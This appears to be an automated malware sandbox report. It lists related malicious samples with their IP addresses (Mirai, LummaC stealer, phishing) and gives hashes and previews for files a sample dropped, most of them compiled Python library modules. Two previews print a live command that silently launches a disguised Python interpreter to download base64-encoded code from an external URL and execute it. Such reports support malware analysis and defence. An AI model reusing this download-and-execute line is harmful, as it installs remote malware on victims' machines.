                                                                                                                                                                                                                https://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                • 107.22.100.5
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                • 34.226.108.155
                                                                                                                                                                                                                https://f.io/nWWUxvn6Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                • 52.45.152.88
                                                                                                                                                                                                                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 54.196.163.229
                                                                                                                                                                                                                la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 54.157.218.48
                                                                                                                                                                                                                la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 23.21.163.240
                                                                                                                                                                                                                la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                • 52.73.205.225
                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                                                                                                                                                                                • 34.226.108.155
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):199
                                                                                                                                                                                                                Entropy (8bit):4.902027640009365
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:fwzkiyCLRoIcs21QPgABLnoDOpEiKppey:foLRdc2PvUOGyy
                                                                                                                                                                                                                MD5:6EB678386A5C1566FE0D3DFDCDF9C016
                                                                                                                                                                                                                SHA1:8F220DFE6F5A8B13AB8EBB7B61C4D51C396F2349
                                                                                                                                                                                                                SHA-256:D6C014294514C61DB20158CF1D6834D26226101139FEC8D36F0C618F77D7D3AF
                                                                                                                                                                                                                SHA-512:598D0D20D07086ACE9F90EACFBAF95EDB1B29F3FDD7291DD615366513A4C6EB1FFEE7C30598D3B607D267C666996878AE4B336CBF8032496DBC3EF27723B9FD2
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:start "" /min "synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" ..
                                                                                                                                                                                                                Process:C:\Windows\System32\certutil.exe
                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):207
                                                                                                                                                                                                                Entropy (8bit):4.981734348239866
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6:Q38wzkiyCLRoIcs21QPgABLnoDOpEiKppey:Q38oLRdc2PvUOGyy
                                                                                                                                                                                                                MD5:334FA39C1FF8FB4421EC3369087A583C
                                                                                                                                                                                                                SHA1:BD958FAEE1B01510C1451C69A6E0BCDB2B007B90
                                                                                                                                                                                                                SHA-256:84EE478DF453B9D0319867BD0CF0181DD7C3145893D32BC78F32CAA74BBCB347
                                                                                                                                                                                                                SHA-512:DF3D0D966359F45EABCF8B89D9ADDBA1C5FE47D29041B76B45F4B640E34B5891D83C4F487351AA0432EF23AEA46E83EFF08C6C3012448D65DD8F3EF062297EA9
                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                Preview:..&cls..start "" /min "synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))" ..
                                                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15
                                                                                                                                                                                                                Entropy (8bit):3.7735572622751845
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:RRriov:3rb
                                                                                                                                                                                                                MD5:7FC149CA05FAC524FACC140040FC4ECA
                                                                                                                                                                                                                SHA1:787D7431F8F3E8BE035BC75BAA8F080EDF4E5E2D
                                                                                                                                                                                                                SHA-256:2BF2801F119A2D847AEB00F72316B7B81DC703D255DB80220F3E56A0D3D41BA4
                                                                                                                                                                                                                SHA-512:40981CCB2363BB77765FFCCB0321C12A06DF1681A4CF3A36CDDB9D77DD78B1A29EB098109F2C46873F6B46DD56B3839DA983201BAC3BFDF62C1444A4C5782405
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview://4mY2xzDQo= ..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4141
                                                                                                                                                                                                                Entropy (8bit):5.356387023654646
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:PgdNzUuGd+P2sKNUWfom2j8kQAnPPELBG0uY:G4BRRfom1gPG00uY
                                                                                                                                                                                                                MD5:1E0084A05609B15C101751FB78FCCA27
                                                                                                                                                                                                                SHA1:2C23E476FD92E019CA8E16E631EDEF8CB218A9BC
                                                                                                                                                                                                                SHA-256:D5649A5524FB366A1F6F52C4A7E291D010BF1DF726B601B00363F2854F9C4EFF
                                                                                                                                                                                                                SHA-512:4F9D19090BEDB02354AB11AB2A4E52A7D2B37465E48FDD9D8DF0452942A1D9A69A246D80AD8092CFF8D1DB8BD012DDD5B3BFFC43FEBD34E1F926ECD2BBE8DC81
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).an...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):32935
                                                                                                                                                                                                                Entropy (8bit):5.0341667231464
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:ipDl8l+6pg6mG5JlooICwimTmIufuBEQtJHVDOA/8AH:qql+VVSooICwimT3ufu+AJ1DOcvH
                                                                                                                                                                                                                MD5:3477F947A7019267857F8CF229BA4D12
                                                                                                                                                                                                                SHA1:4D1A537316AD6D79C285A06B2DFEFA603079CBDB
                                                                                                                                                                                                                SHA-256:9951F87B112481416A07918B01C778C4F5A531E9E1899B8891094C754B78F40F
                                                                                                                                                                                                                SHA-512:DE177491ACD44C38AC3E2D6553924D7A821E6A0B9591448CA54C87451320A6E94F7264C29E9560594C8BEE09D3BE389AC874A9D3C609A57FFDA68F96B370E97B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Z*e*..Z*e.e*..Z+e*.,....[*d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d*..d*e8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF.3e(....G.dAdB..dBe;..ZGG.dCdD..dDeGeC..ZHeH.3e$..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4522
                                                                                                                                                                                                                Entropy (8bit):5.133072752703084
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:enAZIr5Mc+SHmtPK4Q9XEf9j0K5ULIPmwPu7gKxNW4q4RqOJd0f:eNAByEeIOQCxNWQRqOT0f
                                                                                                                                                                                                                MD5:7EF7D9DE92B3E82BBD127E8628232E53
                                                                                                                                                                                                                SHA1:350ABCE56E612EC83E9FFD5B34DDA5AF894FDB96
                                                                                                                                                                                                                SHA-256:936CD629D4902B261BE5D2F5B31D841E7A16C1C2CB0426960047137C2B9699F7
                                                                                                                                                                                                                SHA-512:EDFFFCE0661E21FA22945F8EBC074809741E142527DA451220E39A388376E3D13AEDE7BDC9D1C2AD41989C0AC336BF03544ED8869FA675E6ED0AA6606C03D9C0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sB...d.Z.d.d.l.Z.d.d.l.Z.e.j.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.).z7Internal classes used by the gzip, lzma and bz2 modules.....Nc....................@...s0...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...BaseStreamz.Mode-checking helper functions.c....................C...s....|.j.r.t.d.....d.S.).Nz.I/O operation on closed file)...closed..ValueError....self..r.....-C:\Users\user\Desktop\tmp\lib\_compression.py.._check_not_closed....s..........z.BaseStream._check_not_closedc....................C........|.....s.t...d.....d.S.).Nz.File not open for reading)...readable..io..UnsupportedOperationr....r....r....r......_check_can_read...............z.BaseStream._check_can_readc....................C...r....).Nz.File not open for writing)...writabler....r....r....r....r....r......_check_can_write....r....z.BaseStream._check_can_writec....................C...s(...|.....s.t...d.....|.....s.t...d.....d.S.).Nz3Seeking is only supported on files o
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3557
                                                                                                                                                                                                                Entropy (8bit):5.065266191696214
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:/sOn3nh9/uydg7ls3pl+ltJ5+XdaCjteUzCt/BHKGZEIy0EEt:/s8nfcls3plwtJEXdaIeUzMJty0EG
                                                                                                                                                                                                                MD5:5397B4C53B8040348BF65525A7398462
                                                                                                                                                                                                                SHA1:DB3A3E6EDF1B4DCAD453CB1AEB6EA82E9AECF79C
                                                                                                                                                                                                                SHA-256:12297E808B53BA355DEABB970B8CAC029F3299F5FB80178DA4518815E0A704A4
                                                                                                                                                                                                                SHA-512:311A7A443A338C37DE5F1A5BA59F01B68E7ABA72917ED2529DE0ACADD150996F3F6940BCA219D41EC7434FFF2A1A7B9AA9910A9CDD67DEADF0C6C4BF54C725B9
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s@...d.Z.d.d.l.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z=.The objects used by the site module to add custom builtins.......Nc....................@...s&...e.Z.d.Z.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...Quitterc....................C...s....|.|._.|.|._.d.S...N....name..eof)...selfr....r......r......C:\Users\user\Desktop\tmp\lib\_sitebuiltins.py..__init__....s........z.Quitter.__init__c....................C...s....d.|.j.|.j.f...S.).Nz.Use %s() or %s to exitr......r....r....r....r......__repr__....s......z.Quitter.__repr__Nc....................C...s&...z.t.j.......W.t.|...........Y.t.|.....r....)...sys..stdin..close..SystemExit).r......coder....r....r......__call__....s................z.Quitter.__call__r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s6...e.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._Printerzninteractive prompt objects for printin
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7618
                                                                                                                                                                                                                Entropy (8bit):4.612056628337532
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:2oGsAmOjav3ze0qLnKFHWpLiEEskjXoNizmM8+WsxL13vbRJv4ZO1VAUV0KcyyYP:bGsAbj236LTKF2pLiE3kjXoEzml+Wsxz
                                                                                                                                                                                                                MD5:51ACE651212181D1547B1DFF0D41878B
                                                                                                                                                                                                                SHA1:0D1EBFFF980B988ECE7F7A86A3B82F59C2455D2F
                                                                                                                                                                                                                SHA-256:CE28F0BC6CCB94BFD85F3B496D20B5ACEA954C7F559E9C8A244C65589B5DB3B6
                                                                                                                                                                                                                SHA-512:5E329D00F80DCE3ACC49577962658506F5680B2F44210CC3A4992A7F1152EBE1F914CDFA2F2677B094D5141BD51414F5CC19F657FF03E915DE43F10443AACDD8
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s>...d.d.l.m.Z...d.d.l.m.Z...d.g.Z.G.d.d...d...Z.G.d.d...d...Z.d.S.)..........ref)...Generiuseras..WeakSetc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)..._IterationGuardc....................C...s....t.|...|._.d.S...N).r......weakcontainer)...selfr......r.....,C:\Users\user\Desktop\tmp\lib\_weakrefset.py..__init__....s......z._IterationGuard.__init__c....................C...s ...|.....}.|.d.u.r.|.j...|.....|.S.r....).r......_iterating..add).r......wr....r....r......__enter__....s............z._IterationGuard.__enter__c....................C...s8...|.....}.|.d.u.r.|.j.}.|...|.....|.s.|.......d.S.d.S.d.S.r....).r....r......remove.._commit_removals).r......e..t..br......sr....r....r......__exit__....s....................z._IterationGuard.__exit__N)...__name__..__module__..__qualname__r....r....r....r....r....r....r....r........s............r....c....................@...s&...e.Z.d.Z.d@d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):6761
                                                                                                                                                                                                                Entropy (8bit):5.1187352766228305
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:OTc2+dPAO6MGWUls1p2N8R6Diag2z9o2Ue4loXLk5ebUtoH:P2+dPwMGxYtag2VXLk5ewc
                                                                                                                                                                                                                MD5:37DD7F3C6BBA7CD37EF349AD9EC30ECD
                                                                                                                                                                                                                SHA1:54F2CAB0DF8CE0F8738C1CEF2236E896BFDD8C2D
                                                                                                                                                                                                                SHA-256:ECF230945CE746F2EC88A466412130A7C09CAA6379E66E5517D5FDB2841CE013
                                                                                                                                                                                                                SHA-512:22DFA7F984BAE6A8F6312F790999DC18B42089D3913EA20B33315610F022D0CA5FAFDACFB61769FF30FA43BE013B18273302FBD3581D226EF2DEE809E5D3D71F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d6........................@...s....d.Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...W.n...e.yH......d.d.l.m.Z.m.Z...d.e._.Y.n.w.G.d.d...d.e...Z.d.d...Z.G.d.d...d.e.d...Z.d.S.).z3Abstract Base Classes (ABCs) according to PEP 3119.c....................C...s....d.|._.|.S.).a<...A decorator indicating abstract methods... Requires that the metaclass is ABCMeta or derived from it. A. class that has a metaclass derived from ABCMeta cannot be. instantiated unless all of its abstract methods are overridden.. The abstract methods can be called using any of the normal. 'super' call mechanisms. abstractmethod() may be used to declare. abstract methods for properties and descriptors... Usage:.. class C(metaclass=ABCMeta):. @abstractmethod. def my_abstract_method(self, ...):. .... T)...__isabstractmethod__).Z.funcobj..r.....$C:\Users\user\Desktop\tmp\lib\abc.py..abstr
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17172
                                                                                                                                                                                                                Entropy (8bit):5.4971630803985
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:mZvQ1Oayn9wBqXa71hITEetuAk8M77m2n9t/MRWFA3CTDTIzuQc4bimd3c6tV3:E3ay9wgq71hITuDyq9PXT4uQuI3htV3
                                                                                                                                                                                                                MD5:C7656854759C12F25F849C4A54FCA47C
                                                                                                                                                                                                                SHA1:71C181EDBA047F366733DF26E02014AE7E7C63C0
                                                                                                                                                                                                                SHA-256:1F764AEF24A56E5D74F8F5BCCC1B8463453C6C725F54896009CE079B3566E0E9
                                                                                                                                                                                                                SHA-512:8CD5D6472CAC2B5F2EF1FE106E0BE5FA9453D331B5B26A3651080CE3E6EE42E4F806B2181A6432887F2AE9382FFBD590A59BE064F33A910620685B8BC6523A54
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.S.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.e.e.f.Z.d.d...Z.dQd.d...Z.dRd.d...Z.d.d...Z.d.d...Z.e...d.d...Z.e...d.d...Z.d.d...Z.d.d...Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.a.i.a.d.d...Z.dSd.d...Z.d.d...Z.e.j.d d!..e._.dSd"d#..Z.e.j.d e.d$..e._.d%d&..Z.e.j.d'd!..e._.dTd(d)..Z.e.j.d'd*d$..e._.d+d,..Z dTd-d...Z!d.a"d.a#d/Z$d0Z%dUd1d2..Z&d.d.d.d.d3..d4d5..Z'd.d.d6d7..d8d9..Z(d:Z)d.a*d.a+d.a,dTd;d<..Z-d=d>..Z.d?Z/e/d@..dA..Z0dBdC..Z1dDdE..Z2dFdG..Z3dHdI..Z4dJdK..Z5dLdM..Z6dNdO..Z7e8dPk.r.e6....d.S.d.S.)VzDBase16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings.....N)...encode..decode..encodebytes..decodebytes..b64encode..b64decode..b32encode..b32decode..b32hexencode..b32hexdecode..b16encode..b16decode..b85encode..b85decode..a85encode..a85decode..standard_b64encode..standard_b64decode..urlsafe_b64encode..urlsafe_b64decodec....................C...sl...t.|.t...r.z.|...d...W.S...t.y.......t.d.....w.t.|.t...r.|.S.z.t.|.......W.S...t.y5......t.d.|.j.j.....d...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2598
                                                                                                                                                                                                                Entropy (8bit):5.20294100635134
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:vChwHaPJ7Bn7V31EOCl7VU3OpOBn7B3wCLnCRl7VC39eV:vCh7Bx31EOC03OpOB93wGCRi34V
                                                                                                                                                                                                                MD5:8E5C0A78540E3AA7471324CFB3682197
                                                                                                                                                                                                                SHA1:E82F693AB3DC07EDFA2B34F1220F43B461F0C0E3
                                                                                                                                                                                                                SHA-256:B2229F42CA329DFFB79B5163407ADB0221C61B9139764B4A884A9217E8A2EC15
                                                                                                                                                                                                                SHA-512:7ADCC3477784BC81572983319F18624D1D7B483CA9616A24A27FD1CE9344FB990283E4B859151734DE48FEA26E00DCCF2DE274F12EF4550338C5492DF045B926
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sp...d.Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.d.d.d...d.d...Z.z.d.d.l.T.W.n...e.y1......Y.n.w.e.Z.e.Z.d.S.).z.Bisection algorithms......N....keyc....................C....>...|.d.u.r.t.|.|.|.|...}.n.t.|.|.|...|.|.|.d...}.|...|.|.....d.S.).z.Insert item x in list a, and keep it sorted assuming a is sorted... If x is already in a, insert it to the right of the rightmost x... Optional args lo (default 0) and hi (default len(a)) bound the. slice of a to be searched.. Nr....)...bisect_right..insert....a..x..lo..hir......r.....'C:\Users\user\Desktop\tmp\lib\bisect.py..insort_right....s............r....c....................C...s....|.d.k.r.t.d.....|.d.u.r.t.|...}.|.d.u.r1|.|.k.r/|.|...d...}.|.|.|...k.r'|.}.n.|.d...}.|.|.k.s.|.S.|.|.k.rN|.|...d...}.|.|.|.|.....k.rF|.}.n.|.d...}.|.|.k.s5|.S.).a....Return the index where to insert item x in list a, assuming a is sorted... The return value i is such that all e in a[:i] have e <= x,
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10880
                                                                                                                                                                                                                Entropy (8bit):5.270867299694734
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:+6Eb2RLSRaQHzW6FVoDCGEUPIzSh/NHSN:jRLSRLpGPIzG/NyN
                                                                                                                                                                                                                MD5:B719FA4C8EC0A6A1FE99BE5994D43149
                                                                                                                                                                                                                SHA1:3C04730A204BCF98210CADAD011FBF031370C188
                                                                                                                                                                                                                SHA-256:4DA6D20E4802E2FBEE87FA09A20E471B3A01B5CFCF9A28C5A014D419E2F608FC
                                                                                                                                                                                                                SHA-512:C987A3DDC6B056EA116B85841F9B88BEB8A2C77154BD4D5888044199AAF5308921A5E470750B7C3E81FDD21FB0E2ACCACEFBC0D143465C7E775F90DB108DE3E1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d./.......................@...s....d.Z.g.d...Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.....d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Interface to the libbzip2 compression library...This module provides a file interface, classes for incremental.(de)compression, and functions for one-shot (de)compression..)...BZ2File..BZ2Compressor..BZ2Decompressor..open..compress..decompressz%Nadeem Vawda <nadeem.vawda@gmail.com>.....).r....N).r....r..............c....................@...s....e.Z.d.Z.d.Z.d*d.d...d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d,d.d...Z.d,d.d...Z.d.d...Z.d,d.d...Z.d,d.d ..Z.d!d"..Z.d#d$..Z.e.j.f.d%d&..Z.d'd(..Z.d)S.)-r....a@...A file object providing transparent bzip2 (de)compression... A BZ2File can act as a wrapper for an existing file object, or refer. directly to a named file on disk... Note that BZ2File provides a *binary* file interface - data read is. returned as bytes, and data t
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):26313
                                                                                                                                                                                                                Entropy (8bit):5.230382732519572
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:mmfNsz3TQClly8bR9PS3q4Rh1mcMjscr3KLr:mGmHS3qF2i3KLr
                                                                                                                                                                                                                MD5:85D7D7C937448F4973FA6B3CE2A4AA35
                                                                                                                                                                                                                SHA1:644927474F78DFB9D897F43EFAA16185E6FB68A6
                                                                                                                                                                                                                SHA-256:0C1C1171C50CEBB5E15D5E1A9ACC106C722CA65906B4492BB6D5242657C666AD
                                                                                                                                                                                                                SHA-512:F3E087FF853C55D132322AE0E34407F742C1FF5CBE7F12808BF09DD0CD377CB0D4431BE694872BBCEA6392ADFC58427ECB47EC4D79CD3DB5F1FBD6EEB1E855C4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.b.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...g.d...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.g.d...Z.G.d.d...d...Z.G.d.d...d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...Z.e.d...\.Z.Z.Z.Z.Z.Z.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d ..Z"d!d"..Z#G.d#d$..d$e$..Z%G.d%d&..d&e%..Z&G.d'd(..d(e%..Z'G.d)d*..d*..Z(G.d+d,..d,e&..Z)G.d-d...d.e'..Z*e&..Z+e+j,Z-d/d0..Z.e+j/Z0e+j1Z1e+j2Z3e+j4Z5e+j6Z6e+j7Z8e+j9Z:e+j;Z<d1Z=d2Z>e=e>f.d3d4..Z?e=e>f.d5d6..Z@d7ZAe..BeAd.d....C..ZDd8d9..ZEd:d;..ZFeGd<k.r.eFe.jH....d.S.d.S.)=a$...Calendar printing functions..Note when comparing these calendars to the ones printed by cal(1): By.default, these calendars have Monday as the first day of the week, and.Sunday as the last (the European convention). Use setfirstweekday() to.set the first day of the week (0=Monday, 6=Sunday)......N)...repeat)...IllegalMonthError..IllegalWeekdayError..setfirstweekday..firstweekday..isleap..leapdays..weekday..monthrange..monthcalendar..prmonth..m
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):33229
                                                                                                                                                                                                                Entropy (8bit):5.020912032075243
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:Fa/o6wZxokNQceWYXgYD7msLySGRbmOZwENNflPKPBxKa:FEUkFrOZwENNflPKPBxKa
                                                                                                                                                                                                                MD5:9178F10004A871F76AF68F0318BB6C00
                                                                                                                                                                                                                SHA1:3802B365154245A8F4532892EDFC0A35925B60C4
                                                                                                                                                                                                                SHA-256:A76D003D92A6302AE0C298CC48435E44A731860A89ED160F14C975431124263B
